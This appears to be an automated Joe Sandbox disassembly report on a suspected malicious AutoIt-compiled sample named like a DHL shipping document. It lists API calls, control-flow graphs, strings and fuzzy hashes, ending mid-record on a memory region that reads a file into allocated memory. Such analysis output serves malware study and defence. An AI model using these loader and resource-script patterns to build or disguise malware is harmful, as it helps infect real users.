                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1986165174-0
                                                                                  • Opcode ID: 07ee9f6c8fce4af37e5db3d13cf470ccd1c34eb12449ce7208ec946752317038
                                                                                  • Instruction ID: 30e5809ee47b0a6bd790d3b694e101fefcb6d028a93846d456da0d63513c05f3
                                                                                  • Opcode Fuzzy Hash: 07ee9f6c8fce4af37e5db3d13cf470ccd1c34eb12449ce7208ec946752317038
                                                                                  • Instruction Fuzzy Hash: 9D91C23154ABC4DFC731DBA885611AABFE4FF36310B485A5FD0CA83B41D631A908D71A

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1063 8d4fe9-8d5001 CreateStreamOnHGlobal 1064 8d5021-8d5026 1063->1064 1065 8d5003-8d501a FindResourceExW 1063->1065 1066 90dd5c-90dd6b LoadResource 1065->1066 1067 8d5020 1065->1067 1066->1067 1068 90dd71-90dd7f SizeofResource 1066->1068 1067->1064 1068->1067 1069 90dd85-90dd90 LockResource 1068->1069 1069->1067 1070 90dd96-90ddb4 1069->1070 1070->1067
                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008D4EEE,?,?,00000000,00000000), ref: 008D4FF9
                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008D4EEE,?,?,00000000,00000000), ref: 008D5010
                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F), ref: 0090DD60
                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F), ref: 0090DD75
                                                                                  • LockResource.KERNEL32(008D4EEE,?,?,008D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,008D4F8F,00000000), ref: 0090DD88
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                  • String ID: SCRIPT
                                                                                  • API String ID: 3051347437-3967369404
                                                                                  • Opcode ID: 1e92df45b76a691fb45a20654eae8e667f5d0dbb693c6833baf92772bb4a4e2a
                                                                                  • Instruction ID: 34b49a38639d172716ae6060dd402b0f971d653e09ad65016ef3b6ee877ad76b
                                                                                  • Opcode Fuzzy Hash: 1e92df45b76a691fb45a20654eae8e667f5d0dbb693c6833baf92772bb4a4e2a
                                                                                  • Instruction Fuzzy Hash: E7115175240B01BFD7218B66DC58F677BB9FBC5722F108269F415C6290DB61DC009661
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,0090E7C1), ref: 009346A6
                                                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 009346B7
                                                                                  • FindClose.KERNEL32(00000000), ref: 009346C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                  • String ID:
                                                                                  • API String ID: 48322524-0
                                                                                  • Opcode ID: 24bec2ce910477e1ac34f5ad72e0bbd9d01afc6a3d49ac9be373a6ff1b3ddae6
                                                                                  • Instruction ID: f2b12f135d3a1f32f3a0395324f2d9441e840319271ca6560882ffc1ca8abd4d
                                                                                  • Opcode Fuzzy Hash: 24bec2ce910477e1ac34f5ad72e0bbd9d01afc6a3d49ac9be373a6ff1b3ddae6
                                                                                  • Instruction Fuzzy Hash: 4DE020364245005B52106B38EC5E4EA775CDE0737AF100715F935C20F0E7B06D509BD6
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E0BBB
                                                                                  • timeGetTime.WINMM ref: 008E0E76
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E0FB3
                                                                                  • TranslateMessage.USER32(?), ref: 008E0FC7
                                                                                  • DispatchMessageW.USER32(?), ref: 008E0FD5
                                                                                  • Sleep.KERNEL32(0000000A), ref: 008E0FDF
                                                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 008E105A
                                                                                  • DestroyWindow.USER32 ref: 008E1066
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008E1080
                                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 009152AD
                                                                                  • TranslateMessage.USER32(?), ref: 0091608A
                                                                                  • DispatchMessageW.USER32(?), ref: 00916098
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009160AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                  • API String ID: 4003667617-3242690629
                                                                                  • Opcode ID: fe272181d968df1965b93786d0dc6b11485d2a76ef951b72a38aaf5d338cd2f7
                                                                                  • Instruction ID: 29e733249e600054044a207c1a414cad46a33de9c6803bcb814bbca434b18dab
                                                                                  • Opcode Fuzzy Hash: fe272181d968df1965b93786d0dc6b11485d2a76ef951b72a38aaf5d338cd2f7
                                                                                  • Instruction Fuzzy Hash: 21B2B170608745DFD724DF28C884BAAB7E5FF85304F154A1EE49AC72A1DB75E884CB82

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 009391E9: __time64.LIBCMT ref: 009391F3
                                                                                    • Part of subcall function 008D5045: _fseek.LIBCMT ref: 008D505D
                                                                                  • __wsplitpath.LIBCMT ref: 009394BE
                                                                                    • Part of subcall function 008F432E: __wsplitpath_helper.LIBCMT ref: 008F436E
                                                                                  • _wcscpy.LIBCMT ref: 009394D1
                                                                                  • _wcscat.LIBCMT ref: 009394E4
                                                                                  • __wsplitpath.LIBCMT ref: 00939509
                                                                                  • _wcscat.LIBCMT ref: 0093951F
                                                                                  • _wcscat.LIBCMT ref: 00939532
                                                                                    • Part of subcall function 0093922F: _memmove.LIBCMT ref: 00939268
                                                                                    • Part of subcall function 0093922F: _memmove.LIBCMT ref: 00939277
                                                                                  • _wcscmp.LIBCMT ref: 00939479
                                                                                    • Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AAE
                                                                                    • Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AC1
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009396DC
                                                                                  • _wcsncpy.LIBCMT ref: 0093974F
                                                                                  • DeleteFileW.KERNEL32(?,?), ref: 00939785
                                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0093979B
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009397AC
                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009397BE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                  • String ID:
                                                                                  • API String ID: 1500180987-0
                                                                                  • Opcode ID: 02a5cad2649e13b72ea45759827c9a1dc8e77795f2e7ea6e229d6fcdd9411069
                                                                                  • Instruction ID: 058a768ebc6bc619afb8df5ade86c353bda3256a94d06dac64a955c30262844e
                                                                                  • Opcode Fuzzy Hash: 02a5cad2649e13b72ea45759827c9a1dc8e77795f2e7ea6e229d6fcdd9411069
                                                                                  • Instruction Fuzzy Hash: D1C11AB1D00219AADF21DFA5CC85AEEB7BDEF55310F0040AAF609E6251DB709A848F65

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008D3074
                                                                                  • RegisterClassExW.USER32(00000030), ref: 008D309E
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
                                                                                  • LoadIconW.USER32(000000A9), ref: 008D30F2
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  • Opcode ID: 508ac4f71db86272ba8dca15723ca6c39734e9a936b19b7433d1c15805407092
                                                                                  • Instruction ID: e4e35d238ed7d7793bbdd2c0111e3fdb0553e706ee85df8de6d0ddba84996522
                                                                                  • Opcode Fuzzy Hash: 508ac4f71db86272ba8dca15723ca6c39734e9a936b19b7433d1c15805407092
                                                                                  • Instruction Fuzzy Hash: D43167B1869309AFDB00CFA9D888ADDBBF4FB09321F14456AE580E62A0D3B50545DF40

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008D3074
                                                                                  • RegisterClassExW.USER32(00000030), ref: 008D309E
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
                                                                                  • LoadIconW.USER32(000000A9), ref: 008D30F2
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  • Opcode ID: f7f94f568e6d296d4fd337928181ca79f69deb6e59801e9cbe7e6b75b39f2046
                                                                                  • Instruction ID: baf5eb6fdea8638da360f0fa2c24518b506972c58e12d7920b1b5cf095d88bee
                                                                                  • Opcode Fuzzy Hash: f7f94f568e6d296d4fd337928181ca79f69deb6e59801e9cbe7e6b75b39f2046
                                                                                  • Instruction Fuzzy Hash: D921C5B1925318AFDB00DFAAE859BDDBBF4FB08721F04412AF910A62A0D7B14544AF91

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 008D4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009962F8,?,008D37C0,?), ref: 008D4882
                                                                                    • Part of subcall function 008F074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008D72C5), ref: 008F0771
                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008D7308
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0090ECF1
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0090ED32
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0090ED70
                                                                                  • _wcscat.LIBCMT ref: 0090EDC9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                  • API String ID: 2673923337-2727554177
                                                                                  • Opcode ID: 594809e857a05a38e6555e3b882263727bebffb3afd203efe246301713f5fc36
                                                                                  • Instruction ID: bc26aac23ecf35724aeb333ef483531cb74305ef8f91e4c5642918f7f87d86bd
                                                                                  • Opcode Fuzzy Hash: 594809e857a05a38e6555e3b882263727bebffb3afd203efe246301713f5fc36
                                                                                  • Instruction Fuzzy Hash: DE71397142C3059EC714EFA9D8819AFBBE8FF94750B44492FF455C32A1EB309948DB52

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008D3A62
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 008D3A71
                                                                                  • LoadIconW.USER32(00000063), ref: 008D3A88
                                                                                  • LoadIconW.USER32(000000A4), ref: 008D3A9A
                                                                                  • LoadIconW.USER32(000000A2), ref: 008D3AAC
                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008D3AD2
                                                                                  • RegisterClassExW.USER32(?), ref: 008D3B28
                                                                                    • Part of subcall function 008D3041: GetSysColorBrush.USER32(0000000F), ref: 008D3074
                                                                                    • Part of subcall function 008D3041: RegisterClassExW.USER32(00000030), ref: 008D309E
                                                                                    • Part of subcall function 008D3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D30AF
                                                                                    • Part of subcall function 008D3041: InitCommonControlsEx.COMCTL32(?), ref: 008D30CC
                                                                                    • Part of subcall function 008D3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008D30DC
                                                                                    • Part of subcall function 008D3041: LoadIconW.USER32(000000A9), ref: 008D30F2
                                                                                    • Part of subcall function 008D3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008D3101
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                  • String ID: #$0$AutoIt v3
                                                                                  • API String ID: 423443420-4155596026
                                                                                  • Opcode ID: 5fddb846da06304ac978c4f54cf8f966eb8cac824c3215870b0e603e1caf5199
                                                                                  • Instruction ID: 49fe1214780a85d9ca720035c74a11f90dd6839301e1624feb81dbc555853a04
                                                                                  • Opcode Fuzzy Hash: 5fddb846da06304ac978c4f54cf8f966eb8cac824c3215870b0e603e1caf5199
                                                                                  • Instruction Fuzzy Hash: 0C214B70929308AFEB109FA9EC09B9D7BB4FB08711F00016BE514E62A0D7BA5654AF85

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$
                                                                                  • API String ID: 1825951767-2885450264
                                                                                  • Opcode ID: 90ed7e5f5a5a8ce0e0a2f4e561d2905702bfd79fa63582ad8d45aed59937c223
                                                                                  • Instruction ID: 3b7829bd75ef56b38949dc4d11d1e1eccf0ddaad1280c3d184659de63c00107f
                                                                                  • Opcode Fuzzy Hash: 90ed7e5f5a5a8ce0e0a2f4e561d2905702bfd79fa63582ad8d45aed59937c223
                                                                                  • Instruction Fuzzy Hash: 69A13E7181022D9ACB14EBA9CC95AEEB778FF14304F44062BF412F7291EF745A09CB62

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 885 8d3633-8d3681 887 8d36e1-8d36e3 885->887 888 8d3683-8d3686 885->888 887->888 891 8d36e5 887->891 889 8d3688-8d368f 888->889 890 8d36e7 888->890 892 8d375d-8d3765 PostQuitMessage 889->892 893 8d3695-8d369a 889->893 895 8d36ed-8d36f0 890->895 896 90d31c-90d34a call 8e11d0 call 8e11f3 890->896 894 8d36ca-8d36d2 DefWindowProcW 891->894 903 8d3711-8d3713 892->903 899 8d36a0-8d36a2 893->899 900 90d38f-90d3a3 call 932a16 893->900 902 8d36d8-8d36de 894->902 897 8d3715-8d373c SetTimer RegisterWindowMessageW 895->897 898 8d36f2-8d36f3 895->898 932 90d34f-90d356 896->932 897->903 906 8d373e-8d3749 CreatePopupMenu 897->906 904 8d36f9-8d370c KillTimer call 8d44cb call 8d3114 898->904 905 90d2bf-90d2c2 898->905 907 8d36a8-8d36ad 899->907 908 8d3767-8d3776 call 8d4531 899->908 900->903 925 90d3a9 900->925 903->902 904->903 911 90d2c4-90d2c6 905->911 912 90d2f8-90d317 MoveWindow 905->912 906->903 914 90d374-90d37b 907->914 915 8d36b3-8d36b8 907->915 908->903 919 90d2e7-90d2f3 SetFocus 911->919 920 90d2c8-90d2cb 911->920 912->903 914->894 922 90d381-90d38a call 92817e 914->922 923 8d36be-8d36c4 915->923 924 8d374b-8d375b call 8d45df 915->924 919->903 920->923 928 90d2d1-90d2e2 call 8e11d0 920->928 922->894 923->894 923->932 924->903 925->894 928->903 932->894 936 90d35c-90d36f call 8d44cb call 8d43db 932->936 936->894
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 008D36D2
                                                                                  • KillTimer.USER32(?,00000001), ref: 008D36FC
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008D371F
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008D372A
                                                                                  • CreatePopupMenu.USER32 ref: 008D373E
                                                                                  • PostQuitMessage.USER32(00000000), ref: 008D375F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                  • String ID: TaskbarCreated
                                                                                  • API String ID: 129472671-2362178303
                                                                                  • Opcode ID: 14f748a20bf134979fc70a377891bb7602e6c940c563fcfb90007392d6a478e7
                                                                                  • Instruction ID: aa9b73438e1f7ef0e7793f1a750888fc81604db408cab3af49360a98abae74ad
                                                                                  • Opcode Fuzzy Hash: 14f748a20bf134979fc70a377891bb7602e6c940c563fcfb90007392d6a478e7
                                                                                  • Instruction Fuzzy Hash: C941D6B2128609ABDF246B6CEC09B793759FB15351F14033BF502D63E1DB609A50B763

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 942 e4f5d8-e4f686 call e4cfd8 945 e4f68d-e4f6b3 call e504e8 CreateFileW 942->945 948 e4f6b5 945->948 949 e4f6ba-e4f6ca 945->949 950 e4f805-e4f809 948->950 954 e4f6d1-e4f6eb VirtualAlloc 949->954 955 e4f6cc 949->955 952 e4f84b-e4f84e 950->952 953 e4f80b-e4f80f 950->953 956 e4f851-e4f858 952->956 957 e4f811-e4f814 953->957 958 e4f81b-e4f81f 953->958 961 e4f6f2-e4f709 ReadFile 954->961 962 e4f6ed 954->962 955->950 963 e4f8ad-e4f8c2 956->963 964 e4f85a-e4f865 956->964 957->958 959 e4f821-e4f82b 958->959 960 e4f82f-e4f833 958->960 959->960 967 e4f835-e4f83f 960->967 968 e4f843 960->968 969 e4f710-e4f750 VirtualAlloc 961->969 970 e4f70b 961->970 962->950 965 e4f8c4-e4f8cf VirtualFree 963->965 966 e4f8d2-e4f8da 963->966 971 e4f867 964->971 972 e4f869-e4f875 964->972 965->966 967->968 968->952 973 e4f757-e4f772 call e50738 969->973 974 e4f752 969->974 970->950 971->963 975 e4f877-e4f887 972->975 976 e4f889-e4f895 972->976 982 e4f77d-e4f787 973->982 974->950 978 e4f8ab 975->978 979 e4f897-e4f8a0 976->979 980 e4f8a2-e4f8a8 976->980 978->956 979->978 980->978 983 e4f789-e4f7b8 call e50738 982->983 984 e4f7ba-e4f7ce call e50548 982->984 983->982 990 e4f7d0 984->990 991 e4f7d2-e4f7d6 984->991 990->950 992 e4f7e2-e4f7e6 991->992 993 e4f7d8-e4f7dc CloseHandle 991->993 994 e4f7f6-e4f7ff 992->994 995 e4f7e8-e4f7f3 VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E4F6A9
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E4F8CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileFreeVirtual
